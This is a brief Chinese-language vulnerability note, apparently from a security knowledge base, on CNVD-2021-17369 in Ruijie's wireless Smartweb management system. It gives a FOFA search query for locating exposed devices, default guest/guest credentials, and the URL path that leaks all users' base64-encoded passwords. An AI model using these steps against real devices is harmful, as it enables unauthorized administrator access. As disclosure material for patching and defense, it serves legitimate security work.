跳转至

锐捷Smartweb管理系统 密码信息泄露 CNVD-2021-17369

锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。

FOFA:

title="无线smartWeb--登录页面"

默认guest账户密码:guest/guest

登录后访问:http://target/web/xml/webuser-auth.xml

获取所有用户账号密码,base64解码即可。

ref:

  • https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ
  • https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369